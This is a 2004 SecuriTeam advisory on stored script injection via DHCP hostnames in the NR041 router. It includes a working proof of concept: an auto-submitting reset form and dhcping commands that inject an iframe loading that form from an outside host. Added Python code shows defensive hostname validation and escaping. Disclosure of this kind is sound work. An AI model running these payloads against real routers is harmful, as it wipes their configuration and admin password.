[NEWS] NetworkEverywhere Router Model NR041 Script Injection via DHCP

From: SecuriTeam (support_at_securiteam.com)
Date: 09/02/04

    To: list@securiteam.com
    Date: 2 Sep 2004 12:55:40 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      NetworkEverywhere Router Model NR041 Script Injection via DHCP


    The Network Everywhere NR041 Cable/DSL 4-port router
    (http://www.networkeverywhere.com/products/nr041.asp) "connects multiple
    PCs to your Cable or DSL modem. The router lets your PCs share one IP
    address from your ISP, files, printers and other resources. It can also
    function as a DHCP server for easy IP assignment".

    DHCP HOSTNAME options originating from clients aren't properly filtered
    for malicious content. Due to this fact, malicious script code can be
    injected and stored on the router.


    Vulnerable Systems:
     * NR041 firmware revision 1.2 release 03

    Since the router doesn't filter out potentially problematic content, it is
    easily possible to inject script code into the web-based administrative
    interface. When the administrator opens the DHCP page, the browser
    executes the script code inside the open, authenticated session, so the
    script has full access to the router. One possible and easily executed
    attack is to cause the script to reset the router to its factory defaults,
    rolling back the administration password as well.

    Since the DHCP daemon is only accessible from within the local network,
    the vulnerability would be hard to exploit. However, if a way exists to
    issue DHCP requests to the router, this vulnerability can be exploited.
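    The filtering the advisory says the router lacks, written out as an added
    defender-side example (not code from the advisory or the vendor): a parser
    for the DHCP options field that extracts option 12 (Host Name), a hostname
    check against the RFC 1123 grammar, and HTML-escaping of whatever the admin
    DHCP table renders. The two option blocks are constructed sample data; the
    second carries the same kind of HTML fragment the advisory describes.

```python
import html
import re

# Constructed DHCP option blocks (the bytes that follow the fixed BOOTP
# header): magic cookie, option 53 = DHCPDISCOVER, option 12 = hostname,
# option 255 = end. Sample values only, not captured traffic.
BENIGN_OPTIONS = (b"\x63\x82\x53\x63" b"\x35\x01\x01"
                  b"\x0c\x09laptop-01" b"\xff")
HOSTILE_OPTIONS = (b"\x63\x82\x53\x63" b"\x35\x01\x01"
                   b"\x0c\x0c<iframe id='" b"\xff")

# RFC 1123 label: letters, digits and hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def parse_options(data: bytes) -> dict:
    """Return {option_code: value_bytes} from a DHCP options field."""
    if data[:4] != b"\x63\x82\x53\x63":
        raise ValueError("missing DHCP magic cookie")
    opts, i = {}, 4
    while i < len(data):
        code = data[i]
        if code == 255:          # end option
            break
        if code == 0:            # pad option has no length byte
            i += 1
            continue
        length = data[i + 1]
        opts[code] = data[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def valid_hostname(raw: bytes, max_len: int = 63) -> bool:
    """Accept only hostnames where every label fits the RFC 1123 grammar."""
    try:
        name = raw.decode("ascii")
    except UnicodeDecodeError:
        return False
    if not name or len(name) > max_len:
        return False
    return all(_LABEL.match(label) for label in name.split("."))


def lease_row(options: dict) -> str:
    """Admin-page table cell: reject bad names, then escape as a second layer."""
    raw = options.get(12, b"")
    shown = raw.decode("ascii") if valid_hostname(raw) else "(invalid hostname)"
    return "<td>%s</td>" % html.escape(shown, quote=True)
```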

    A proof of concept can be carried out using DHCPing, available from
    http://c3rb3r.openwall.net/dhcping/.

    As mentioned above, the NR041 is configured via a web-based
    administrative interface made up of several CGIs invoked with the HTTP
    POST method. Exploitation isn't entirely easy under these circumstances
    (the hostname is a 15-character string that cannot be split wherever one
    wishes), but a known trick from the exploitation of the DLINK 614+ can be
    used for assistance.

     * Step 1:
    Because there isn't enough room to perform adequate exploitation in one
    shot, a different approach can be used: injecting code for an IFRAME that
    will force the browser to remotely load a certain HTML file, i.e. "a.htm",
    from a malicious website. This file contains a form which will auto-submit
    itself when loaded. The code for such an HTML file is presented below.
    However, it is important to note that due to the length limitations the
    filename should be as short as possible:

    <html><head>
    <script language="JavaScript">
    function SymError() {
      return true;
    }
    window.onerror = SymError;
    </script>
    <script language="javascript">
    function autopost() {
      document.xx.submit();
    }
    </script>
    </head><body onload="javascript:document.xx.submit();">
    <form name=xx method=post action="">
    <input type=hidden name=FactoryDefaults value="Enable">
    </form></body></html>

    The actual attack carried out by this HTML file is to call passwd.cgi with
    the "factorydefaults" option enabled. Notice that the router's IP is
    hardcoded in this file, but it could instead be obtained from the HTTP
    Referer header, making this script work seamlessly.

     * Step 2:
    Inject the script containing the IFRAME using DHCPing, like so:

    dhcping -optleasetime 3600 -opttype discover -optreqip
    -opthostname "/../a.htm' > " -m af:af:af:af:af:af

    dhcping -optleasetime 3600 -opttype discover -optreqip
    -opthostname "'src='//url.ca/" -m af:af:af:af:af:ae

    dhcping -optleasetime 3600 -opttype discover -optreqip
    -opthostname "<iframe id=' " -m af:af:af:af:af:ad


    The information has been provided by Mathieu Lacroix
    (Daemonz@videotron.ca).


    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
